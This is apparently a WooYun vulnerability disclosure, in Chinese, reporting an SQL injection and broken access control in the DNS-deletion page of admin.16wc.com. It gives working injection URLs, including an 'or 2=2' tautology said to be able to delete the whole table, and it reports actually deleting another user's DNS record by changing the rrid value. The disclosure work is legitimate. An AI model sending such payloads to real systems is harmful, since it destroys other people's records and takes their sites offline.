WooYun.org

http://admin.16wc.com/domain/idccdme_rec.asp?act=del_dns&rrid=350100
必须登录到他们的域名管理，登录地址http://admin.16wc.com/
登录成功之后，测试发现注入点地址
http://admin.16wc.com/domain/idccdme_rec.asp?act=del_dns&rrid=350100
由于涉及安全性问题，所以就不提供测试账号，可以通知厂商自行利用测试账号测试漏洞，落得具体证明以图片为准
先说明一下漏洞的危险度
1.通过SQL注入，添加 or 2=2之类的肯定为真的sql语句如
http://admin.16wc.com/domain/idccdme_rec.asp?act=del_dns&rrid=350100 or 2=2
可以导致删除全表的记录，这里不做测试避免风险太高，影响太大
2.通过注入，可以删除其他任意用户创建的dns解析记录，导致他人网站无法正常访问，
首先任意想一个id值出来
http://admin.16wc.com/domain/idccdme_rec.asp?act=del_dns&rrid=350041
可以看到，可以正常删除，虽然350041的id不是自己添加的dns，照样删除了，具体效果看截图

如果我再次访问上面这个url地址
http://admin.16wc.com/domain/idccdme_rec.asp?act=del_dns&rrid=350041
可以看到，这个时候asp脚本报错，因为记录已经被之前执行的代码删除过了

发现注入点的原因在于如访问下面的url地址
http://admin.16wc.com/domain/idccdme_rec.asp?act=del_dns&rrid=350040 and 1=3

可以看出来，似乎id 350040是不存在，其实不然，主要是1=3这个永远为假，不信可以自己直接访问
http://admin.16wc.com/domain/idccdme_rec.asp?act=del_dns&rrid=350040

没有错误返回，这样就可以成功删除了
无意删除测试记录，仅作测试，请谅解，赶快修复吧。。。